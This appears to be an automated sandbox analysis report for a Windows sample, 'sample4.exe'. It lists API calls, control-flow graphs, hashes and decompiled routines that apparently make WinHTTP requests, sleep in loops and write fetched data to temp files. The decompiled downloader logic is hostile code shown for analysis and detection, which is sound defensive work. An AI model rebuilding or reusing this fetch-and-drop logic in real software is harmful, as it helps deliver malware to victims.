                                                                                                                                                                                                                                                                • RtlReAllocateHeap.NTDLL(00000000,?,00000000), ref: 000D1670
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000000), ref: 000D167A
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 000D167D
                                                                                                                                                                                                                                                                • WinHttpReadData.WINHTTP(00000000,?,?,?,?,00000000), ref: 000D1697
                                                                                                                                                                                                                                                                • WinHttpQueryDataAvailable.WINHTTP(00000000,?,?,00000000), ref: 000D16B7
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000000), ref: 000D16D9
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 000D16DC
                                                                                                                                                                                                                                                                • WinHttpCloseHandle.WINHTTP(00000000,?,00000000), ref: 000D16FE
                                                                                                                                                                                                                                                                • WinHttpCloseHandle.WINHTTP(?,?,00000000), ref: 000D1708
                                                                                                                                                                                                                                                                • WinHttpCloseHandle.WINHTTP(00000000,?,00000000), ref: 000D1713
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Http$Heap$Process$CloseHandleQuery$DataHeadersOpenRequest$AllocAllocateAvailableCallbackConnectFreeOptionReadReceiveResponseSendStatus
                                                                                                                                                                                                                                                                • String ID: GET$POST
                                                                                                                                                                                                                                                                • API String ID: 3496152665-3192705859
                                                                                                                                                                                                                                                                • Opcode ID: f0c7e1b3994349f864dc974a657cd9f9b8f679138acc29c0e54f4e8e5b625699
                                                                                                                                                                                                                                                                • Instruction ID: 8f9113f999cf29f88113894e7362d783796a8ae27b44d4988216095876c55cca
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0c7e1b3994349f864dc974a657cd9f9b8f679138acc29c0e54f4e8e5b625699
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8612C75104705AFE7208F64DC48B6BBBEDFB88705F044A1EBA96D2261DB78D9088B71
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 254 118a16-118a31 RtlEnterCriticalSection 255 118a40-118a45 254->255 256 118a33-118a3a 254->256 258 118a62-118a6c 255->258 259 118a47-118a4a 255->259 256->255 257 118aeb-118aee 256->257 261 118af0-118af3 257->261 262 118af6-118b12 RtlLeaveCriticalSection 257->262 263 118a83-118aae GlobalHandle GlobalUnWire call 1188e3 GlobalReAlloc 258->263 264 118a6e-118a81 call 1188e3 GlobalAlloc 258->264 260 118a4d-118a50 259->260 265 118a52-118a58 260->265 266 118a5a-118a5c 260->266 261->262 271 118ab1-118ab3 263->271 264->271 265->260 265->266 266->257 266->258 272 118ab5-118ab8 271->272 273 118abc-118ae8 GlobalFix call 24afd0 271->273 275 118b23-118b2f RtlLeaveCriticalSection call 11871e 272->275 276 118aba-118b1d GlobalHandle GlobalFix 272->276 273->257 276->275
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 00118A23
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,00000000,z(,?,00118C67,00000004,001192CB,00118752,001192F4,0011B475,00119580,?,001196B4), ref: 00118A7B
                                                                                                                                                                                                                                                                • GlobalHandle.KERNEL32(00000000), ref: 00118A86
                                                                                                                                                                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 00118A8F
                                                                                                                                                                                                                                                                • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 00118AA8
                                                                                                                                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 00118ABD
                                                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 00118B04
                                                                                                                                                                                                                                                                • GlobalHandle.KERNEL32(00000000), ref: 00118B16
                                                                                                                                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 00118B1D
                                                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 00118B24
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$CriticalSection$AllocHandleLeave$EnterWire
                                                                                                                                                                                                                                                                • String ID: z(
                                                                                                                                                                                                                                                                • API String ID: 1877740037-72658202
                                                                                                                                                                                                                                                                • Opcode ID: 2701b22e3b876741891e1b470784c8173f01e853be49f771b9c6d26feba5b3b4
                                                                                                                                                                                                                                                                • Instruction ID: ef388c66d18bcc42c0049a1c14605158dd2b1d2430f74ba9af496e7077a20058
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2701b22e3b876741891e1b470784c8173f01e853be49f771b9c6d26feba5b3b4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0131C371600605BFCB08DF64EC89A99B7B8FF55301B20866AE901D3651DFB1F991CBD0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 379 d22b0-d22dc call d216d 382 d237c 379->382 383 d22e2-d22f0 379->383 384 d237e-d2382 382->384 385 d22fe-d2303 383->385 386 d22f2-d22fc 383->386 387 d2308-d2314 call d2218 385->387 386->387 390 d2326-d232b 387->390 391 d2316-d2320 GetProcessHeap RtlFreeHeap 387->391 390->382 392 d232d-d2357 call d216d 390->392 391->390 392->382 395 d2359-d235e 392->395 395->382 396 d2360-d2362 395->396 397 d2364-d2368 396->397 398 d2383-d2393 396->398 397->382 399 d236a-d2376 GetProcessHeap RtlFreeHeap 397->399 398->384 399->382
                                                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                                                			E000D22B0(signed char __ecx, intOrPtr __edx, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                                                				char _v540;
                                                                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                                                                				signed char _t38;
                                                                                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                                                                                				intOrPtr _t53;
                                                                                                                                                                                                                                                                				void* _t55;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t38 = __ecx;
                                                                                                                                                                                                                                                                				_v20 = __edx;
                                                                                                                                                                                                                                                                				if(E000D216D(0xd465c, 0,  &_v8,  &_v16) == 0) {
                                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t55 = _v8;
                                                                                                                                                                                                                                                                				_push( &_v540);
                                                                                                                                                                                                                                                                				_push(_t55);
                                                                                                                                                                                                                                                                				if(__ecx == 0) {
                                                                                                                                                                                                                                                                					_t51 = 0xd4644;
                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                					_t51 = 0xd4650;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_v12 = E000D2218(_t51);
                                                                                                                                                                                                                                                                				if(_t55 != 0) {
                                                                                                                                                                                                                                                                					RtlFreeHeap(GetProcessHeap(), 0, _t55); // executed
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				if(_v12 != 0) {
                                                                                                                                                                                                                                                                					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                					_t29 = E000D216D( &_v540,  !( ~(_t38 & 0x000000ff)) & E000D20BA,  &_v8,  &_v16); // executed
                                                                                                                                                                                                                                                                					if(_t29 == 0) {
                                                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					_t53 = _v16;
                                                                                                                                                                                                                                                                					if(_t53 == 0) {
                                                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					if(_t38 == 0) {
                                                                                                                                                                                                                                                                						 *_a4 = _v8;
                                                                                                                                                                                                                                                                						 *_a8 = _t53;
                                                                                                                                                                                                                                                                						return 1;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					if(_v8 != 0) {
                                                                                                                                                                                                                                                                						RtlFreeHeap(GetProcessHeap(), 0, _v8); // executed
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                                                0x000d22ba
                                                                                                                                                                                                                                                                0x000d22c1
                                                                                                                                                                                                                                                                0x000d22dc
                                                                                                                                                                                                                                                                0x000d237c
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d237c
                                                                                                                                                                                                                                                                0x000d22e9
                                                                                                                                                                                                                                                                0x000d22ec
                                                                                                                                                                                                                                                                0x000d22ed
                                                                                                                                                                                                                                                                0x000d22f0
                                                                                                                                                                                                                                                                0x000d22fe
                                                                                                                                                                                                                                                                0x000d22f2
                                                                                                                                                                                                                                                                0x000d22f2
                                                                                                                                                                                                                                                                0x000d22f7
                                                                                                                                                                                                                                                                0x000d230d
                                                                                                                                                                                                                                                                0x000d2314
                                                                                                                                                                                                                                                                0x000d2320
                                                                                                                                                                                                                                                                0x000d2320
                                                                                                                                                                                                                                                                0x000d232b
                                                                                                                                                                                                                                                                0x000d2343
                                                                                                                                                                                                                                                                0x000d234d
                                                                                                                                                                                                                                                                0x000d2357
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d2359
                                                                                                                                                                                                                                                                0x000d235e
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d2362
                                                                                                                                                                                                                                                                0x000d2389
                                                                                                                                                                                                                                                                0x000d238e
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d2392
                                                                                                                                                                                                                                                                0x000d2368
                                                                                                                                                                                                                                                                0x000d2376
                                                                                                                                                                                                                                                                0x000d2376
                                                                                                                                                                                                                                                                0x000d2368

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 000D216D: wsprintfW.USER32 ref: 000D2188
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 000D2319
                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,?,?), ref: 000D2320
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 000D236F
                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,?,?,?,?,?), ref: 000D2376
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$FreeProcess$wsprintf
                                                                                                                                                                                                                                                                • String ID: DF$PF$\F$src="$url("
                                                                                                                                                                                                                                                                • API String ID: 2268164792-905904459
                                                                                                                                                                                                                                                                • Opcode ID: 4c857e31cc6ddd45ffe3d85bac787102f32b1fec3036ab13c25d2a537aa04c76
                                                                                                                                                                                                                                                                • Instruction ID: 5a0afe63d70836a3fb3b3549cda6e5cfc2fb53e3a5da991892fb79985cc4ad0d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c857e31cc6ddd45ffe3d85bac787102f32b1fec3036ab13c25d2a537aa04c76
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6021B076A41308ABDF14DBA4C845BEE77F8EB29301F144567AD05A7384EA388E04CBB0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(forces,0028EA38,0000076D,00006B3E,?), ref: 0011629B
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000005E5), ref: 001167B7
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\sample4.exe,0000076D), ref: 001169C4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentFileModuleNameSleepVariable
                                                                                                                                                                                                                                                                • String ID: B($8B($C:\Users\user\Desktop\sample4.exe$forces$ -
                                                                                                                                                                                                                                                                • API String ID: 3564984567-255835185
                                                                                                                                                                                                                                                                • Opcode ID: 577d2c0e55f697fdad6602c7ab2446acd9218c4e0192406c9ab1dc1e728b3b76
                                                                                                                                                                                                                                                                • Instruction ID: 68bff896be3860165bcbf086622d77affdcfe2aa2d839df50cc3564b3a6b0813
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 577d2c0e55f697fdad6602c7ab2446acd9218c4e0192406c9ab1dc1e728b3b76
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2682E57950A2918FD30CCB35B8A91F67FE5EBA9B15F08052EF4C4873A1D229C789DB11
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 726 d2395-d23cc GetTickCount 727 d24b3 726->727 728 d24b5-d24b7 727->728 729 d24bd 728->729 730 d23d1-d23ea call d22b0 728->730 732 d24bf-d24c9 729->732 734 d2498-d24ab Sleep 730->734 735 d23f0-d23f3 730->735 734->728 736 d24ad-d24b1 734->736 737 d2479 735->737 738 d23f9-d2424 call d24cf 735->738 736->727 740 d24ca-d24cd 736->740 739 d247d-d247f 737->739 745 d2426-d2471 GetTempPathA wsprintfA call d13e1 738->745 746 d2473-d2477 738->746 742 d2491 739->742 743 d2481-d248b GetProcessHeap HeapFree 739->743 740->732 742->734 743->742 745->739 746->737
                                                                                                                                                                                                                                                                C-Code - Quality: 97%
                                                                                                                                                                                                                                                                			E000D2395(intOrPtr __ecx, void* __edx, signed int* _a4, void** _a8) {
                                                                                                                                                                                                                                                                				char _v252;
                                                                                                                                                                                                                                                                				char _v260;
                                                                                                                                                                                                                                                                				signed int _v264;
                                                                                                                                                                                                                                                                				signed int _v268;
                                                                                                                                                                                                                                                                				signed int _v272;
                                                                                                                                                                                                                                                                				intOrPtr _v276;
                                                                                                                                                                                                                                                                				void* _v280;
                                                                                                                                                                                                                                                                				char _v284;
                                                                                                                                                                                                                                                                				void* _v288;
                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                				signed int _t25;
                                                                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                                                                				void* _t31;
                                                                                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                                                                                				void** _t45;
                                                                                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                                                                                				void* _t59;
                                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                                				signed int* _t65;
                                                                                                                                                                                                                                                                				void** _t67;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t67 =  &_v288;
                                                                                                                                                                                                                                                                				 *0xd3004 = __ecx;
                                                                                                                                                                                                                                                                				_t59 = __edx;
                                                                                                                                                                                                                                                                				_t25 = GetTickCount();
                                                                                                                                                                                                                                                                				_t65 = _a4;
                                                                                                                                                                                                                                                                				_t45 = _a8;
                                                                                                                                                                                                                                                                				 *0xd3000 = _t25 & 0x7fffff00;
                                                                                                                                                                                                                                                                				 *_t65 =  *_t65 & 0x00000000;
                                                                                                                                                                                                                                                                				 *_t45 =  *_t45 & 0x00000000;
                                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                                					_t62 = _t59;
                                                                                                                                                                                                                                                                					while(_t59 != 0) {
                                                                                                                                                                                                                                                                						_t29 = E000D22B0( *((intOrPtr*)(_t62 + 1)), _t62 + 2, _t62, __eflags,  &_v288,  &_v284); // executed
                                                                                                                                                                                                                                                                						__eflags = _t29;
                                                                                                                                                                                                                                                                						if(_t29 != 0) {
                                                                                                                                                                                                                                                                							__eflags =  *_t45;
                                                                                                                                                                                                                                                                							if( *_t45 != 0) {
                                                                                                                                                                                                                                                                								L6:
                                                                                                                                                                                                                                                                								_t47 = _v288;
                                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                                								_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                                                								_v268 = _v268 & 0x00000000;
                                                                                                                                                                                                                                                                								_v264 = _v264 & 0x00000000;
                                                                                                                                                                                                                                                                								_v276 = 4;
                                                                                                                                                                                                                                                                								_v280 = 0xd3000;
                                                                                                                                                                                                                                                                								_t35 = E000D24CF( &_v288);
                                                                                                                                                                                                                                                                								__eflags = _t35 - 1;
                                                                                                                                                                                                                                                                								if(_t35 != 1) {
                                                                                                                                                                                                                                                                									asm("sbb eax, eax");
                                                                                                                                                                                                                                                                									_t59 = _t59 &  ~_t35;
                                                                                                                                                                                                                                                                									__eflags = _t59;
                                                                                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                                									 *_t65 = _v268;
                                                                                                                                                                                                                                                                									 *_t45 = _v264;
                                                                                                                                                                                                                                                                									wsprintfA( &(( &_v260)[GetTempPathA(0x104,  &_v260)]), "~%u.tmp",  *0xd3000);
                                                                                                                                                                                                                                                                									_t47 = _v280;
                                                                                                                                                                                                                                                                									E000D13E1( &_v252, _t47, _v276);
                                                                                                                                                                                                                                                                									_t67 =  &(_t67[4]);
                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                							__eflags = _t47;
                                                                                                                                                                                                                                                                							if(_t47 != 0) {
                                                                                                                                                                                                                                                                								HeapFree(GetProcessHeap(), 0, _t47);
                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                							_t45 = _a8;
                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                						_t62 = _t62 + ( *_t62 & 0x000000ff);
                                                                                                                                                                                                                                                                						__eflags =  *_t62;
                                                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                							goto L11;
                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                						L15:
                                                                                                                                                                                                                                                                						return _t31;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					_t31 = 0;
                                                                                                                                                                                                                                                                					goto L15;
                                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                                					__eflags =  *_t65;
                                                                                                                                                                                                                                                                				} while (__eflags == 0);
                                                                                                                                                                                                                                                                				_t31 = 1;
                                                                                                                                                                                                                                                                				goto L15;
                                                                                                                                                                                                                                                                			}























                                                                                                                                                                                                                                                                0x000d2395
                                                                                                                                                                                                                                                                0x000d239b
                                                                                                                                                                                                                                                                0x000d23a5
                                                                                                                                                                                                                                                                0x000d23a7
                                                                                                                                                                                                                                                                0x000d23ad
                                                                                                                                                                                                                                                                0x000d23b9
                                                                                                                                                                                                                                                                0x000d23c0
                                                                                                                                                                                                                                                                0x000d23c5
                                                                                                                                                                                                                                                                0x000d23c9
                                                                                                                                                                                                                                                                0x000d24b3
                                                                                                                                                                                                                                                                0x000d24b3
                                                                                                                                                                                                                                                                0x000d24b5
                                                                                                                                                                                                                                                                0x000d23e1
                                                                                                                                                                                                                                                                0x000d23e8
                                                                                                                                                                                                                                                                0x000d23ea
                                                                                                                                                                                                                                                                0x000d23f0
                                                                                                                                                                                                                                                                0x000d23f3
                                                                                                                                                                                                                                                                0x000d2479
                                                                                                                                                                                                                                                                0x000d2479
                                                                                                                                                                                                                                                                0x000d23f9
                                                                                                                                                                                                                                                                0x000d23f9
                                                                                                                                                                                                                                                                0x000d2402
                                                                                                                                                                                                                                                                0x000d2407
                                                                                                                                                                                                                                                                0x000d240c
                                                                                                                                                                                                                                                                0x000d2414
                                                                                                                                                                                                                                                                0x000d241c
                                                                                                                                                                                                                                                                0x000d2421
                                                                                                                                                                                                                                                                0x000d2424
                                                                                                                                                                                                                                                                0x000d2475
                                                                                                                                                                                                                                                                0x000d2477
                                                                                                                                                                                                                                                                0x000d2477
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d2426
                                                                                                                                                                                                                                                                0x000d242a
                                                                                                                                                                                                                                                                0x000d2431
                                                                                                                                                                                                                                                                0x000d2455
                                                                                                                                                                                                                                                                0x000d245f
                                                                                                                                                                                                                                                                0x000d2469
                                                                                                                                                                                                                                                                0x000d246e
                                                                                                                                                                                                                                                                0x000d246e
                                                                                                                                                                                                                                                                0x000d2424
                                                                                                                                                                                                                                                                0x000d247d
                                                                                                                                                                                                                                                                0x000d247f
                                                                                                                                                                                                                                                                0x000d248b
                                                                                                                                                                                                                                                                0x000d248b
                                                                                                                                                                                                                                                                0x000d2491
                                                                                                                                                                                                                                                                0x000d2491
                                                                                                                                                                                                                                                                0x000d249d
                                                                                                                                                                                                                                                                0x000d24a6
                                                                                                                                                                                                                                                                0x000d24a8
                                                                                                                                                                                                                                                                0x000d24ab
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d24bf
                                                                                                                                                                                                                                                                0x000d24c9
                                                                                                                                                                                                                                                                0x000d24c9
                                                                                                                                                                                                                                                                0x000d24bd
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d24ad
                                                                                                                                                                                                                                                                0x000d24ad
                                                                                                                                                                                                                                                                0x000d24ad
                                                                                                                                                                                                                                                                0x000d24cc
                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 000D23A7
                                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 000D243D
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 000D2455
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 000D2484
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 000D248B
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 000D249D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$CountFreePathProcessSleepTempTickwsprintf
                                                                                                                                                                                                                                                                • String ID: ~%u.tmp
                                                                                                                                                                                                                                                                • API String ID: 1386548744-3559650149
                                                                                                                                                                                                                                                                • Opcode ID: 87f80acff3db17a6b88d8737bd65a9b4f2a0c722edf5b88f0979059dd8b34118
                                                                                                                                                                                                                                                                • Instruction ID: 446ebb5d4ded9fa42c13a4de753ed44d9090c2b7285d573c7329956c4c146fee
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87f80acff3db17a6b88d8737bd65a9b4f2a0c722edf5b88f0979059dd8b34118
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 603181725093419FE720DF60D884BAA7BE4FB98315F00491BFA9987281DB789648CB72
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 00147068
                                                                                                                                                                                                                                                                • VerSetConditionMask.NTDLL(00000000), ref: 00147070
                                                                                                                                                                                                                                                                • VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 00147081
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00001000), ref: 00147092
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: __EH_prolog3.LIBCMT ref: 0014799F
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000016), ref: 001479A8
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(0000000F), ref: 001479BB
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000015), ref: 001479D2
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(0000000F), ref: 001479DE
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(0000000F), ref: 00147A14
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000010), ref: 00147A22
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000015), ref: 00147A30
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000016), ref: 00147A3E
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000014), ref: 00147A4C
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000012), ref: 00147A5A
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000011), ref: 00147A68
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000006), ref: 00147A73
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(0000000D), ref: 00147A7E
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(0000000E), ref: 00147A89
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000005), ref: 00147A94
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000008), ref: 00147AA2
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000009), ref: 00147AAD
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000007), ref: 00147AB8
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000002), ref: 00147AC3
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(00000003), ref: 00147ACE
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(0000001B), ref: 00147ADC
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(0000001C), ref: 00147AEA
                                                                                                                                                                                                                                                                  • Part of subcall function 00147998: GetSysColor.USER32(0000000A), ref: 00147AF8
                                                                                                                                                                                                                                                                  • Part of subcall function 0014745F: __EH_prolog3_GS.LIBCMT ref: 00147469
